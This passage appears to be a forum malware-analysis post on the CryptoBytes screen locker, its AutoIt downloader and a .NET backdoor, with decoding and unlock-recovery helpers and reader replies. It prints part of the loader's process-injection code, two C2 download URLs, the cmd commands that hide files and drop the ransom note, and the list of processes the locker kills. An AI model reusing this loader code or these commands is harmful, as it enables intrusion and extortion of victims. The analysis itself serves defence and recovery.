Local $defensiveblinkcommissiondraws = DllStructCreate("STRUCT; " & $craftstrademarksthanksgiving & $borderserverlargesusan & "; ENDSTRUCT; ptr AttributeList")
Local $likelihoodattendedball = DllStructCreate("ptr Process; ptr Thread; dword ProcessId; dword ThreadId")
Local $housingwaitbowl = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", 0x2000000, "bool", False, "dword", ProcessExists("explorer.exe"))
$strikestopic = DllStructCreate("handle ExplorerHandle;")
DllStructSetData($strikestopic, "ExplorerHandle", $housingwaitbowl)
$gradeshenablingprobe = DllCall("kernel32.dll", "bool", "InitializeProcThreadAttributeList", "ptr", NULL, "dword", 0x1, "dword", 0x0, "dword*", 0x0)
$ensuressomewhatware = DllCall("kernel32.dll", "ptr", "HeapAlloc", "hWnd", DllCall("Kernel32.dll", "hWnd", "GetProcessHeap"), "dword", 0x0, "dword", $gradeshenablingprobe)
DllStructSetData($defensiveblinkcommissiondraws, "AttributeList", $ensuressomewhatware)
DllStructSetData($defensiveblinkcommissiondraws, "cbSize", DllStructGetSize($defensiveblinkcommissiondraws))
$partnershipspecialized = 0x8080004
If ProcessExists("avp.exe") Then $partnershipspecialized = 0x8000004
$housingwaitbowl = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", NULL, "wstr", $verizonactressresistant & " " & $compensationdesktoptrademarkphpbb, "ptr", 0x0, "ptr", 0x0, "int", 0x0, "dword", $partnershipspecialized, "ptr", 0x0, "ptr", 0x0, "ptr", DllStructGetPtr($defensiveblinkcommissiondraws), "ptr", DllStructGetPtr($likelihoodattendedball))
Local $doctorprintingseason = JACOBCAMEDECEMBERDESCRIPTION($likelihoodattendedball, "Process")
Local $stampfreedomnam = JACOBCAMEDECEMBERDESCRIPTION($likelihoodattendedball, "Thread")
Local $hzassetwired = JACOBCAMEDECEMBERDESCRIPTION($likelihoodattendedball, "ProcessId")
Local $headlinesflag, $countusernamepackedparticipants, $troutperfumethrowscircle
$troutperfumethrowscircle = Execute("@AutoItX64")
If $troutperfumethrowscircle Then
$headlinesflag = 0x2
$countusernamepackedparticipantspart1 = "align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home; dword ContextFlags; dword MxCsr; word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags; uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7; uint64 Rax; uint64 Rcx; uint64 Rdx; "
$countusernamepackedparticipantspart2 = "uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15; uint64 Rip; uint64 Header; uint64 Legacy; uint64 Xmm0; uint64 Xmm1; uint64 Xmm2; uint64 Xmm3; uint64 Xmm4; uint64 Xmm5; uint64 Xmm6; uint64 Xmm7; "
$countusernamepackedparticipantspart3 = "uint64 Xmm8; uint64 Xmm9; uint64 Xmm10; uint64 Xmm11; uint64 Xmm12; uint64 Xmm13; uint64 Xmm14; uint64 Xmm15; uint64 VectorRegister; uint64 VectorControl; uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip"
$countusernamepackedparticipants = DllStructCreate($countusernamepackedparticipantspart1 & $countusernamepackedparticipantspart2 & $countusernamepackedparticipantspart3)
Else
$headlinesflag = 0x1
$countusernamepackedparticipantspart4 = "dword ContextFlags; dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7; dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; "
$countusernamepackedparticipantspart5 = "byte RegisterArea; dword Cr0NpxState; dword SegGs; dword SegFs; dword SegEs; dword SegDs; dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax; dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs; byte ExtendedRegisters"
$countusernamepackedparticipants = DllStructCreate($countusernamepackedparticipantspart4 & $countusernamepackedparticipantspart5)
EndIf
```
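The string obfuscation in the AutoIt listing is simple once you see the pattern: every literal is `REFUSEPARA("<n>d<n>d...", <a> + <b>)`, where the first argument is a list of decimal values separated by the letter `d` and the key is the AutoIt expression `a + b`, evaluated as a signed 32-bit integer (AutoIt reads 0xfffffffe as -2). Each value minus the key is one character, which is how `"105d128d123d108d98", 0x9 + 0xfffffffe` in the obfuscated code becomes `"byte["` in the cleaned code. The decoder below is an added example written for this post, not the malware's or the author's code; the function name REFUSEPARA and the sample line come from the listing.

```python
"""Decoder for the REFUSEPARA() string obfuscation in the AutoIt loader.

Added example, not part of the original post. Payload: decimal values
separated by 'd'. Key: the AutoIt expression a + b as a signed 32-bit int.
Each value minus the key is one character of the real string.
"""
import re


def autoit_int32(value: int) -> int:
    """AutoIt evaluates 8-digit hex literals as signed 32-bit integers (0xfffffffe == -2)."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def refusepara(payload: str, key: int) -> str:
    """Re-implementation of the script's REFUSEPARA(): split on 'd', subtract the key."""
    return ''.join(chr(int(v) - key) for v in payload.split('d') if v != '')


# REFUSEPARA("<digits and d>", 0x.. + 0x..) as it appears in the obfuscated source
CALL_RE = re.compile(
    r'REFUSEPARA\("([0-9d]+)",\s*(0x[0-9a-fA-F]+)\s*\+\s*(0x[0-9a-fA-F]+)\)')


def _key(a_hex: str, b_hex: str) -> int:
    return autoit_int32(autoit_int32(int(a_hex, 16)) + autoit_int32(int(b_hex, 16)))


def decode_calls(source: str) -> list:
    """Return the decoded string of every REFUSEPARA(...) call found in AutoIt source."""
    return [refusepara(payload, _key(a, b)) for payload, a, b in CALL_RE.findall(source)]


def deobfuscate(source: str) -> str:
    """Replace each REFUSEPARA(...) call with the decoded AutoIt string literal."""
    def repl(m):
        text = refusepara(m.group(1), _key(m.group(2), m.group(3)))
        return '"' + text.replace('"', '""') + '"'
    return CALL_RE.sub(repl, source)


# One line copied from the obfuscated listing above
SAMPLE_LINE = ('Local $framingremedyadoptionspelling = DllStructCreate('
               'REFUSEPARA("105d128d123d108d98", 0x9 + 0xfffffffe) & '
               'Call(REFUSEPARA("72d111d116d103d120d127d82d107d116", 0x9 + 0xfffffffd), '
               '$hrsinvestigationtheir) & REFUSEPARA("102", 0xf + 0xfffffffa))')

# Argument of one of the junk PixelGetColor() calls in the same listing
JUNK_PAYLOAD = ('74d92d73d80d74d71d82d76d93d80d85d71d87d76d89d80d86d75d71d79d76d72d75d76d89d71')

if __name__ == '__main__':
    print(decode_calls(SAMPLE_LINE))
    print(deobfuscate(SAMPLE_LINE))
    print(refusepara(JUNK_PAYLOAD, 7))  # dictionary words: the dead-code branches are noise
```

Running `deobfuscate()` over the whole extracted script gives the readable version shown above; the strings inside the never-taken `Case` branches decode to random dictionary words, which confirms those branches are junk.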
Downloader body:
The function sub_7FF7DDCF50A0 shows the exact request:
Requested URLs:
http://193.233.232.86/api/crazyfish.php
http://147.45.47.57/api/crazyfish.php
If the response is HTTP 200 and the body is fish15, execution continues.
Both IPs were already offline when we checked, so the sandbox report was used to continue the analysis.
The sandbox run shows that a large number of additional attack modules are loaded afterwards.
Almost all of the modules are written in .NET and are loaded the same way: the embedded payload is encrypted, the ReadComponentType function decrypts it first, VirtualProtect then changes the memory protection, and a second decryption stage runs before the payload is loaded in memory.
### **DocumentsKKFCAAKFBA.exe (backdoor)**
**Protection:**
Protected with .NET Reactor; we unpacked it before analysis.
**Entry point:**
Taken as a whole, this is a typical backdoor.
1. It first RC4-decrypts two blobs: the first is a PE shellcode loader, the second the shellcode itself. The ciphertexts are large, so we decrypted the first bytes of each by hand to check what they are:
First blob:
Second blob:
The second blob is clearly shellcode.
2. It then calls VirtualProtectEx to make the memory executable and uses CallWindowProcA to transfer control to the first blob (the PE loader), handing it the shellcode to execute. CallWindowProcA is a common indirect-call trick: Windows treats its first argument as a function pointer, so the loader is entered without any direct call to the decrypted buffer.
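When you pull the key and the two ciphertexts out of a sample like this, the triage loop is always the same: RC4-decrypt, then decide whether you are looking at a PE image or raw shellcode. The block below is an added example for this post, not code from the backdoor or its author; the post does not reproduce the sample's key or ciphertext, so the key and both blobs here are constructed (a minimal PE header and a well-known Windows shellcode prologue: cld; call; pushad; mov ebp,esp; xor eax,eax; mov edx,fs:[eax+0x30]). The RC4 routine is checked against the standard "Key"/"Plaintext" test vector.

```python
"""RC4 decryption and PE/shellcode triage, as used on the two blobs in the backdoor.

Added example, not part of the original post. Key and ciphertexts are constructed
because the post does not reproduce the sample's; the workflow is what matters.
"""
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:                              # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Byte patterns of PEB access that almost every Windows shellcode starts with
PEB_ACCESS = (
    b'\x64\xa1\x30\x00\x00\x00',               # mov eax, fs:[0x30]
    b'\x64\x8b\x50\x30',                       # mov edx, fs:[eax+0x30]
    b'\x64\x8b\x40\x30',                       # mov eax, fs:[eax+0x30]
    b'\x65\x48\x8b\x04\x25\x60\x00\x00\x00',   # mov rax, gs:[0x60] (x64)
)


def classify(blob: bytes) -> str:
    """'pe' for an MZ header whose e_lfanew points at 'PE\\0\\0', 'shellcode' when a
    PEB-walking prologue is present, otherwise 'unknown' (wrong key, or more layers)."""
    if len(blob) >= 0x40 and blob[:2] == b'MZ':
        e_lfanew = struct.unpack_from('<I', blob, 0x3C)[0]
        if e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b'PE\x00\x00':
            return 'pe'
    if any(p in blob for p in PEB_ACCESS):
        return 'shellcode'
    return 'unknown'


def decrypt_and_classify(key: bytes, ciphertext: bytes) -> tuple:
    """Decrypt one blob and label it; returns (label, plaintext)."""
    plain = rc4(key, ciphertext)
    return classify(plain), plain


# --- constructed sample data, not taken from the sample ---
SAMPLE_KEY = b'constructed-demo-key'
# minimal PE skeleton: DOS header with e_lfanew = 0x40, then the PE signature
FAKE_PE = b'MZ' + b'\x00' * 0x3A + struct.pack('<I', 0x40) + b'PE\x00\x00' + b'\x00' * 16
# cld; call +0x82; pushad; mov ebp,esp; xor eax,eax; mov edx,fs:[eax+0x30]
FAKE_SHELLCODE = bytes.fromhex('fc e8 82 00 00 00 60 89 e5 31 c0 64 8b 50 30')
ENC_PE = rc4(SAMPLE_KEY, FAKE_PE)
ENC_SHELLCODE = rc4(SAMPLE_KEY, FAKE_SHELLCODE)

if __name__ == '__main__':
    for name, blob in (('first blob', ENC_PE), ('second blob', ENC_SHELLCODE)):
        label, plain = decrypt_and_classify(SAMPLE_KEY, blob)
        print(name, '->', label, plain[:16].hex())
```

If both blobs come back as `unknown`, the key is wrong or there is another layer; with .NET Reactor samples, check whether the string holding the key is itself decoded at runtime before trusting a key read from the decompiler.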
### **Screen locker (lc.exe)**
**Protection:**
**Functional analysis:**
**Ransom note drop:**
1. Writes the ransom note to the user's Desktop (C:\Users\<username>\Desktop). `attrib +h +s +r +i /D` with no file argument marks every file and folder in the current directory (not recursively, there is no /S) as hidden, system, read-only and not content-indexed; hidden+system makes them "protected operating system files", invisible even when Explorer is set to show hidden files. The note info-0v92.txt is then made visible again with `attrib -h +s +r`, so it is the only thing left on the desktop. The `%RANDOM%` prefix means the note's content differs slightly per victim. To recover the files after unlocking, clear the same four attributes (-h -s -r -i, with /D) in each of the five folders below.
```
cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
2. The same for the public Desktop (C:\Users\Public\Desktop):
```
cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
3. The same for the user's Downloads folder (C:\Users\<username>\Downloads):
```
cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
4. The same for the user's Documents folder (C:\Users\<username>\Documents):
```
cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
5. The same for the profile root (C:\Users\<username>):
```
cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the CryptoBytes hacker group! Telegram for contact: @yes_u_are_hacked 1>info-0v92.txt & attrib -h +s +r info-0v92.txt
```
**Kills explorer.exe, so the taskbar and desktop disappear and the machine appears frozen.**
Done with the following command (it is Explorer, not Task Manager, that gets killed):
```
taskkill.exe /im Explorer.exe /f
```
**Persistence (startup entry):**
It writes itself into a startup key under HKEY_CURRENT_USER (the key path is shown in the screenshot).
Process termination:
```
"telegram",
"discord",
"skype",
"zoom",
"msedge",
"chrome",
"opera",
"browser",
"firefox",
"javaw",
"steam",
"steamwebhelper",
"steamservice",
"EpicGamesLauncher"
```
The program actively kills every process in this list (messaging clients, browsers, Java, Steam and the Epic Games launcher), presumably to stop the victim from reaching out for help or working around the lock screen.
**Lock-screen information:**
This function generates the ID and Current PC fields shown on the lock screen.
The ID is built as 'ID:10-A' + key-file contents + '0E' + key-file contents, so the unlock key is displayed to the victim twice.
Current PC is the value of Environment.MachineName.
**System hotkey monitoring:**
This function watches for Ctrl+Alt, Alt+Tab and the Win key; when one is pressed it calls Start on the timer returned by vmethod_8().
**vmethod_8():**
Returns a timer that fires when one of those hotkeys is pressed and restarts the main ransom window, so the victim cannot switch away from it.
**Password check:**
The check is attached to the Enter key event. If the process was started with a debug command-line argument, typing 123 into the password box exits the program.
The normal path compares the input with '0c0v11' + the contents of the key file ($unlocker_id.ux-cryptobytes). On a match it calls the restore routine method_5(); otherwise it calls vmethod_4().Start() to start the timer and prints "Ошибка! Введённый код не совпадает с ключом разблокировки." (Russian for "Error! The entered code does not match the unlock key.").
**Key file generation:**
If the key file does not exist, it writes $unlocker_id.ux-cryptobytes into the user's %LOCALAPPDATA%\Temp directory (C:\Users\<username>\AppData\Local\Temp; "admin" in our screenshots is the sandbox account, so substitute the victim's user name).
The key is the current system time with the colons removed, e.g. 16:34:28 becomes 163428; that value is the unlock secret and is written to the key file. On later starts the locker only checks that the file exists and does not overwrite it, so the key is fixed at the moment of infection. Because it is just a time of day (HHMMSS), there are only 86,400 possible keys.
**Unlock method:**
1. The system has not been rebooted and the lock screen is still visible
Read the ID shown at the bottom-left of the ransom screen: the key appears in it twice, so take the digits between 'ID:10-A' and '0E' and prefix them with 0c0v11. For the screen shown here the password is 0c0v11163744.
2. The system is broken and the lock screen cannot be reached
Boot a PE environment, open C:\Users\<username>\AppData\Local\Temp on the system drive, read the contents of $unlocker_id.ux-cryptobytes (or overwrite it with a value of your choice), prefix 0c0v11 and enter the result as the password. Remember that the locker also hid the user's files, killed explorer.exe and added an HKCU startup entry, and that AppFile.exe dropped a backdoor and further modules: after unlocking, restore the file attributes, remove the startup entry and clean the other components, because the locker is only the visible part of the infection.
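The derivation above (time of day with colons removed, shown twice in the lock-screen ID, prefixed with 0c0v11 for the password) is small enough to put in a helper, which also makes the key-space point concrete. The block below is an added example for this post, not the locker's or the author's code; the constants come from the analysis, while the function names, the `victim` user name and the sample key file are ours. `key_from_lockscreen_id()` relies on the key being digits only, so the single 'E' in the ID marks the separator, and checks that both halves agree before trusting the value; `candidates()` enumerates the whole 86,400-entry key space, which shows why this "ransom" offers no real protection even without the key file.

```python
"""Unlock-code helper for the lc.exe locker, mirroring the analysis in Section 4.

Added example, not part of the original post. The key is the infection time as
HHMMSS, stored in $unlocker_id.ux-cryptobytes under %LOCALAPPDATA%\\Temp; the
lock screen shows 'ID:10-A' + key + '0E' + key; the password is '0c0v11' + key.
Function names and the constructed sample inputs are ours.
"""
import re
import tempfile
from pathlib import Path

PASSWORD_PREFIX = '0c0v11'
ID_PREFIX = 'ID:10-A'
ID_SEPARATOR = '0E'
KEY_FILE = '$unlocker_id.ux-cryptobytes'


def key_from_time(hhmmss: str) -> str:
    """16:34:28 -> 163428, exactly what the locker writes into the key file."""
    if not re.fullmatch(r'\d{2}:\d{2}:\d{2}', hhmmss):
        raise ValueError('expected HH:MM:SS')
    return hhmmss.replace(':', '')


def password_from_key(key: str) -> str:
    """The locker compares the typed password with '0c0v11' + key-file contents."""
    key = key.strip()
    if not re.fullmatch(r'\d{6}', key):
        raise ValueError('key file should hold six digits (HHMMSS), got %r' % key)
    return PASSWORD_PREFIX + key


def lockscreen_id(key: str) -> str:
    """What the lock screen shows at the bottom-left for a given key."""
    return ID_PREFIX + key + ID_SEPARATOR + key


def key_from_lockscreen_id(shown_id: str) -> str:
    """Recover the key from the displayed ID. The key is digits only, so the 'E' is
    unique and the separator is the '0E' in front of it; both halves must agree."""
    shown_id = shown_id.strip()
    if not shown_id.startswith(ID_PREFIX):
        raise ValueError('ID does not start with %s' % ID_PREFIX)
    body = shown_id[len(ID_PREFIX):]
    sep = body.find(ID_SEPARATOR)
    if sep < 0:
        raise ValueError('separator %s not found' % ID_SEPARATOR)
    key, tail = body[:sep], body[sep + len(ID_SEPARATOR):]
    if key != tail:
        raise ValueError('ID halves differ: %r vs %r' % (key, tail))
    return key


def candidates():
    """Every possible password: the key is a time of day, so 24*60*60 = 86,400 values."""
    for h in range(24):
        for m in range(60):
            for s in range(60):
                yield PASSWORD_PREFIX + '%02d%02d%02d' % (h, m, s)


def password_from_key_file(mounted_users_dir: str, username: str) -> str:
    """Offline recovery from a PE environment: read the key file from the victim's
    profile (Users\\<username>\\AppData\\Local\\Temp on the mounted system drive)."""
    path = Path(mounted_users_dir) / username / 'AppData' / 'Local' / 'Temp' / KEY_FILE
    return password_from_key(path.read_text(encoding='utf-8', errors='ignore'))


def demo_offline_recovery() -> str:
    """Self-test with a constructed profile tree standing in for the mounted system drive."""
    with tempfile.TemporaryDirectory() as root:
        temp_dir = Path(root) / 'victim' / 'AppData' / 'Local' / 'Temp'
        temp_dir.mkdir(parents=True)
        (temp_dir / KEY_FILE).write_text('163744')  # the key a 16:37:44 infection would leave
        return password_from_key_file(root, 'victim')


if __name__ == '__main__':
    print(password_from_key(key_from_lockscreen_id('ID:10-A1637440E163744')))
    print(demo_offline_recovery())
```

Typing 86,400 codes into the lock screen is not practical because a wrong code starts the timer that restarts the ransom window, so in practice use the displayed ID or the key file; the point of `candidates()` is that a six-digit time stamp is not a key in any cryptographic sense.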
# **5. Analysis Overview**
## **5.1 Basic information**
### **Malicious files**
**AppFile.exe:** 720.60 MiB, 32-bit I386 PE (minimum OS Windows 2000). An NSIS installer acting as the malicious module downloader.
**DocumentsKKFCAAKFBA.exe:** 278.50 KiB, 32-bit GUI application; the backdoor.
**lc.exe:** 180.50 KiB, 32-bit GUI application; the screen locker that displays the ransom message.
## **5.2 Ransomware behaviour**
**Family:** CryptoBytes (Ukraine)
**First seen:** 2023-09-05
**Threat type:** Ransomware / screen locker.
**Encrypted-file characteristics:** No encrypted-file extension; user files are hidden rather than encrypted. The ransom note is info-0v92.txt.
**Decryptor:** No public decryptor; victims are told to contact the group on Telegram for the key. As shown in Section 4, the unlock code can be derived from the lock-screen ID or the key file without paying.
**Detection names:** Avast (Win32:Malware-gen), ESET-NOD32 (A Variant Of MSIL/Filecoder.LU) and others (see Section 3).
## **5.3 Infection mechanism**
**Symptoms:** The system cannot be used normally (explorer.exe is killed and a lock screen is shown), system information may be exfiltrated by the backdoor, and files in the user's profile folders are hidden.
**Vector:** In this case a trojanized crack downloaded from the internet; the family is also reported via malicious e-mail attachments, malvertising, exploits and malicious links.
## **5.4 Technical characteristics**
**Module download:** AppFile.exe is an NSIS installer that drops a batch script and an AutoIt loader, which downloads and runs further modules. The modules are mostly .NET and are decrypted and loaded in memory.
**Backdoor:** DocumentsKKFCAAKFBA.exe (.NET Reactor protected) RC4-decrypts a PE loader and a shellcode blob, changes memory protection with VirtualProtectEx and transfers control via CallWindowProcA.
**Locker:** lc.exe hides the files in the user's folders, drops the ransom note, kills explorer.exe, adds itself to an HKCU startup key and shows the lock screen. It also monitors Ctrl+Alt, Alt+Tab and the Win key to bring the ransom window back.
## **5.5 Defence evasion**
**AV checks:** The batch stage looks for security-product processes (wrsa.exe, avastui.exe and others) and either sleeps via ping or switches to running the script under AutoIt3.exe with an .a3x extension; the AutoIt stage checks for Kaspersky's avp.exe and adjusts its process-creation flags.
**Process injection:** String obfuscation and encrypted payloads in the AutoIt stage, which spawns a suspended process and injects the payload to load the additional modules.
## **5.6 Unlock and recovery**
**Lock screen reachable:** Read the ID at the bottom-left of the lock screen; the key is the digits between 'ID:10-A' and '0E', and the password is that key prefixed with 0c0v11.
**System unbootable:** From a PE environment, read (or overwrite) %LOCALAPPDATA%\Temp\$unlocker_id.ux-cryptobytes in the victim's profile and prefix the contents with 0c0v11.
## **5.7 Vector and targets**
**Vector:** A fake crack for a professional tool, downloaded and run by the user; the downloader then fetches the backdoor and the locker. Windows only.
**Targets:** Windows users in general (the PE headers only require Windows 2000 or later; the "Windows(2000)" shown by DIE is a minimum version, not the victim's OS). Here the victim was a business user of a specific professional application who wanted a cracked copy.
## **5.8 Recommendations**
- Do not download or run files from untrusted sources, especially cracks and keygens.
- Keep the system and security software up to date.
- Have incident-response tooling ready (a PE boot environment) and keep backups of critical data so a compromised machine can be restored quickly.
- After unlocking, treat the machine as fully compromised: the locker is only the visible component, and the downloader and backdoor have to be removed as well.
A close look at the CryptoBytes locker helps in understanding how it spreads and operates, so that effective defence and incident-response measures can be taken.
Impressive, respect!
Also a question: if I got hit by something like this, could I just boot into PE, format the C: drive and reinstall the system?

> qiusj88 posted on 2024-9-3 20:09:
> Impressive, respect!
> Also a question: if I got hit by something like this, could I just boot into PE, format the C: drive and reinstall the system?

In this case, fortunately, the malware did not actually encrypt the files, it only hid them. If the virus really had encrypted every file with some particular algorithm, then even after reinstalling the system you could not use your original files.

As a beginner I would like to ask: would simply reinstalling the system fix this kind of virus?

Thanks for sharing the process.

This is incredible.

Thanks to the author for publishing such a high-quality long write-up!

Bookmarked for study!

Thanks for sharing, learned a new skill.

Awesome!!!

Thanks for sharing.

> qiusj88 posted on 2024-9-3 20:09:
> Impressive, respect!
> Also a question: if I got hit by something like this, could I just boot into PE, format the C: drive and reinstall the system?

Probably yes, it's just that reinstalling is a hassle.